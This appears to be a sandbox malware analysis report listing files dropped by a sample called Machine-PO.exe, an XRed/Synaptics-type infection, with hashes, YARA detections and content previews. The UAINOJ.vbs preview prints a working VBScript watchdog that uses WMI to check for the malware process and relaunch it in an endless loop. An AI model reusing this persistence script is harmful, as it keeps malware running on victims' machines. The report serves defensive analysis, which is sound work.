                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.9.2.<./.P.i.

                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WEREADB.tmp.xml

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4580
                                                                                                              Entropy (8bit):4.438508193138511
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:cvIwWl8zs4zJg77aI9OhWpW8VYdYm8M4JFPFDz+q8Zsc5Zgd:uIjfWI7Iw7V1JrzhmZgd
                                                                                                              MD5:B5941231E98B37925148245267BFE482
                                                                                                              SHA1:217B7AD7F7E264EE8E853CFDB8248B6497566B0D
                                                                                                              SHA-256:B2A2B616C90DBFBDD1C188E9277B1D07B3E5C161366F89F7EA3FF1BFEA74822A
                                                                                                              SHA-512:A72199105ACFCB5D22887E1FE8A25FC29054547A0FC64CAFB47C3E40A5B029E42FA7D331EBA41CF779F70FEDE2BFF83D84751629E894FCBD492B066625567894
                                                                                                              Malicious:false
                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="653848" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                              C:\ProgramData\Synaptics\RCX7868.tmp

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Desktop\Machine-PO.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:modified
                                                                                                              Size (bytes):771584
                                                                                                              Entropy (8bit):6.638013190381294
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9ICXr:ansJ39LyjbJkQFMhmC+6GD9x
                                                                                                              MD5:ACA4D70521DE30563F4F2501D4D686A5
                                                                                                              SHA1:6C2BAA72EA5D08B6583893B01001E540213F4AAF
                                                                                                              SHA-256:449B6A3E32CEB8FC953EAF031B3E0D6EC9F2E59521570383D08DC57E5FFA3E19
                                                                                                              SHA-512:DA806BD4AC02C45C17ED5D050428B3E7B15E8F148ACB156CFB41EAB3E27C35FA91AB1A55D18C6EF488A82D3379ABF45421432E2EFAF2FAE4968C760D42215A7C
                                                                                                              Malicious:true
                                                                                                              Yara Hits:
                                                                                                              • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCX7868.tmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCX7868.tmp, Author: Joe Security
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              • Antivirus: ReversingLabs, Detection: 92%
                                                                                                              Joe Sandbox View:
                                                                                                              • Filename: 222.exe, Detection: malicious, Browse
                                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                                              C:\ProgramData\Synaptics\Synaptics.exe

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Desktop\Machine-PO.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):2208256
                                                                                                              Entropy (8bit):7.058935933771513
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:49152:AnsHyjtk2MYC5GDokwkn9IMHeaXA0COysPklzMKGmPyaPCSO:Ansmtk2aCdnV/MOKpPCt
                                                                                                              MD5:A6BD561711EA8C2064C20644CCEEE074
                                                                                                              SHA1:CB330A1AD78387BDC401142FEECAC763AC63D3D9
                                                                                                              SHA-256:E6F8EDCBE69419008B7E54F8554FC1AEC66208DE10C26A982D624EA91AED8092
                                                                                                              SHA-512:62D55F02D14D122B10A0EF08DFA5FFA950F4153863246E3F6E6A6BD1A4D1C63321C7C4E9FB4306C0535E73389D764CC0646C0821A62FD50A2896EC49F205490B
                                                                                                              Malicious:true
                                                                                                              Yara Hits:
                                                                                                              • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              • Antivirus: ReversingLabs, Detection: 92%
                                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..........................."..................@..............................B*......0....................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...0...........................@..P....................................@..P........................................................................................................................................

                                                                                                              C:\ProgramData\Synaptics\Synaptics.exe:Zone.Identifier

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Desktop\Machine-PO.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):26
                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                              Malicious:true
                                                                                                              Preview:[ZoneTransfer]....ZoneId=0

                                                                                                              C:\Users\user\AppData\Local\Temp\6tTDnCY.ini

                                                                                                              Download File
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.239273504013797
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0O4IPzSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+cIb+pAZewRDK4mW
                                                                                                              MD5:B59E096EA561CCE5D2A95750B0A96452
                                                                                                              SHA1:7245ED180CF7C8B227FE0DCBC61ADE4CF1562EFE
                                                                                                              SHA-256:910D011ECE260C744974B592AB2913B469DE12A0D034D1A30156A5C0F6160B64
                                                                                                              SHA-512:679D501B6786F86EC137A9F839CB7A92F4A8DFF48EBE33E4EC76056F2965E24932EC40DA9BD9D7DBDB314ADA87465D215B0B68B278D60F2878C5230B036EE30D
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="nkVUp0rTVy8bh-f8doo2nw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                              C:\Users\user\AppData\Local\Temp\7Zw9AbW.ini

                                                                                                              Download File
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.272852403692713
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0OSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+F+pAZewRDK4mW
                                                                                                              MD5:47A290F7F46F9D550E293D3F519D0798
                                                                                                              SHA1:EFC8A48CB57FA1E338B6F3767E8559F3642986F8
                                                                                                              SHA-256:6486C388DD014C899213FACE00398D1EC4E282BF03EC989AFE2801253C57A985
                                                                                                              SHA-512:9E9DE75FBADB8D14443BF30072AF162BAC5DBDDA9AE340E7B9A62599EABEC83A531E33AA1615825CBD700654B53A1B97500B521B0F878FE33D1F0105A1D7D792
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="R6LzWe5OJyDzdUBRCJhGlw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                              C:\Users\user\AppData\Local\Temp\AAaXLdi.ini

                                                                                                              Download File
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.2535117972801695
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0jSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+M+pAZewRDK4mW
                                                                                                              MD5:0667EBFFA347BB93035CA301190D09B6
                                                                                                              SHA1:111893B0CDD5DB692D2D01A16CDF508AB16FACE2
                                                                                                              SHA-256:613C5E077EC99A5DE45CAC9FC6CB546D695B7212985B8D347ABF8058016D8417
                                                                                                              SHA-512:F5C9FD7BE04949E9717A2D08945F60AC1452B37EF5FF487C776E5DA79CDDCB229B8EDC8214A468B10BCFC761BD0B9E299044ED930F3E6D6E359B36FEB7AB5058
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="a27Z9cLu1bqgrwleBCZMeQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                              C:\Users\user\AppData\Local\Temp\EpwzyhN.ini

                                                                                                              Download File
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.274516473581255
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0t3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+63+pAZewRDK4mW
                                                                                                              MD5:E74833DAABB6E4C1223BFD2C49859857
                                                                                                              SHA1:7CBE0B241D187721264216370D91828EF2A0758C
                                                                                                              SHA-256:DF52F0565FF4A8F3754A23E4FB3D267DFA08E0B57E8083ADBA83137EE774FD96
                                                                                                              SHA-512:A32E9C39199C4E289A77D2FE9C83D9174452E9C9EB5F0F9D0702B98517E2C7F17B61A2513CCE24BC265E5DB9341F16FF70D30825C635FA7DABBE55743F44644C
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="V6hp6sqOR8C0IfZPYQ1Otw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                              C:\Users\user\AppData\Local\Temp\FvI4tNl.ini

                                                                                                              Download File
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.267143712988719
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0smrSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+bm+pAZewRDK4mW
                                                                                                              MD5:442D8E9DFA6155ED3E48121DB7DD6A64
                                                                                                              SHA1:C0B7570E420B110F6452158FCFB0FCC26BF3FA2C
                                                                                                              SHA-256:D8010917B88B3B9DD4230132FFAFCFCC468F8EEAFD35499A2E342C835177FDD0
                                                                                                              SHA-512:178FD9D46F2E9B1F184408B41B75AC904C732611D6AFA4D1ACF4DBAF4EE85211A9DEB9C5FF7196B078EC2E9FCFEF4692EB504874892EA948AD98CA2471154310
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="-wDL1r0BzKRDJr9u2pDHCA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                              C:\Users\user\AppData\Local\Temp\GZrLyJhZ.xlsm

                                                                                                              Download File
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:Microsoft Excel 2007+
                                                                                                              Category:dropped
                                                                                                              Size (bytes):18387
                                                                                                              Entropy (8bit):7.523057953697544
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                              MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                              SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                              SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                              SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                              Malicious:false
                                                                                                              Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                                                              C:\Users\user\AppData\Local\Temp\HT6B3BP.ini

                                                                                                              Download File
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.267723242448084
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+03ISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+gI+pAZewRDK4mW
                                                                                                              MD5:1AA5A3A7722CA0FC07C09833AEC79F53
                                                                                                              SHA1:B5BC9CE3A1AC019D7DBB426D810DB94274FB7C83
                                                                                                              SHA-256:0FD39C66B02C1FE2B16A4DAF45512D4813C30D435173491331052247D3C6DB6F
                                                                                                              SHA-512:2FFC8005B01013E9296104EC426694CE410854339E9F918130CD90A90B15BF679A138E1BC32D95DD0253511CE159171EAAA21EE435BBE5D9E80C4387885FC775
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="_ol1Eu8GFqQOYQy8FYqKuw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                              C:\Users\user\AppData\Local\Temp\JM1tvO6.ini

                                                                                                              Download File
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.26978804655957
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0rSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+A+pAZewRDK4mW
                                                                                                              MD5:A456DAAFBE63727E6A602CD04BD05F05
                                                                                                              SHA1:89FA6A0888C628203EDCDD624FBD302274287455
                                                                                                              SHA-256:9E90CD9DBAA0850C493D4879C18B70415758B59AF44ADB55609CBEB1A26CECC6
                                                                                                              SHA-512:925CE1628631AB9DD9569D434C98D340A23019382A501068D03436BA590D81383FA8195EA4B5CA392E4EAE2B9A48204CC7D1B18DF7FE62CECE3BA6687228DA98
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Eav3Q0JfaBR5RJTv06AI5Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                              C:\Users\user\AppData\Local\Temp\UAINOJ.vbs

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Desktop\._cache_Machine-PO.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:modified
                                                                                                              Size (bytes):846
                                                                                                              Entropy (8bit):5.348614386699207
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:dF/UF5pAU/qaG2b6xI6C6x1xLxeQvJWAB/FVEMPENEZaVx5xCA:f/UF5p5t+G+7xLxe0WABNVIqZaVzgA
                                                                                                              MD5:F11D266E874FE642642A74E2C4CE02EE
                                                                                                              SHA1:06C53742E2826DB5391191767CA2D2E1A6F3D806
                                                                                                              SHA-256:DB0EE0922078B7209571BDCE6892EF2C003D15997D6D981E493823EA2BEBF074
                                                                                                              SHA-512:D6ED246CEE36F2E9F290E650E958635D875C4FE8756FE4265A384368AF7ABE3E536006F816A3B43E67BB12930A2D0C91F87B893EEB8482E183A069B108BED733
                                                                                                              Malicious:true
                                                                                                              Yara Hits:
                                                                                                              • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: C:\Users\user\AppData\Local\Temp\UAINOJ.vbs, Author: Joe Security
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              Preview:On error resume next..Dim strComputer,strProcess,fileset..strProcess = "._cache_Machine-PO.exe"..fileset = """C:\Users\user\Desktop\._cache_Machine-PO.exe"""..strComputer = "." ..Dim objShell..Set objShell = CreateObject("WScript.Shell")..Dim fso..Set fso = CreateObject("Scripting.FileSystemObject")..while 1..IF isProcessRunning(strComputer,strProcess) THEN..ELSE..objShell.Run fileset..END IF..Wend..FUNCTION isProcessRunning(BYVAL strComputer,BYVAL strProcessName)..DIM objWMIService, strWMIQuery..strWMIQuery = "Select * from Win32_Process where name like '" & strProcessName & "'"..SET objWMIService = GETOBJECT("winmgmts:" _..& "{impersonationLevel=impersonate}!\\" _ ..& strComputer & "\root\cimv2") ...IF objWMIService.ExecQuery(strWMIQuery).Count > 0 THEN..isProcessRunning = TRUE..ELSE..isProcessRunning = FALSE..END IF..END FUNCTION

                                                                                                              C:\Users\user\AppData\Local\Temp\ZVx31Gs.ini

                                                                                                              Download File
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.254873901113919
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0C+SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Q+pAZewRDK4mW
                                                                                                              MD5:F0A4B67BBB1D02AA1D7EF9E680C46E70
                                                                                                              SHA1:6EB8819B72C808440B35BA85C5ED0ACF26DF2DA8
                                                                                                              SHA-256:3BA4464B655CDEBADE1902DCE8BA7478E10CC898445C0D0B36F4B169B46E80EB
                                                                                                              SHA-512:62A4071841BB14B307D3414C22F53ACA454629A4D5D8523455B4AC9A80E764D92ECDF7E98B11D848E313169098436BB4275250DC7B6D5B67C611412CB98DE688
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="MfdDkp0hMQnFgdkvuPP8vw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                              C:\Users\user\AppData\Local\Temp\f8IqQT7.ini

                                                                                                              Download File
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.2420487402301195
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0EwSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+7w+pAZewRDK4mW
                                                                                                              MD5:24559218BD2AFC8F6DAD09BB30D04A0A
                                                                                                              SHA1:D090AE6C30C474A7D57547CAE059C32E9CDA6155
                                                                                                              SHA-256:C0EA93EDCB967CE74035B4D6C34954FABD9A0119D8312831FD1546AB38BBCBA9
                                                                                                              SHA-512:8364B15E908BFF2A3AC3A51F225C0347A8CB2B5696715E2C97B4911C704092803E1847385D8F51ABA6C089EF73841C9BD0CB109E6204579A92485ACA003AB39D
                                                                                                              Malicious:false
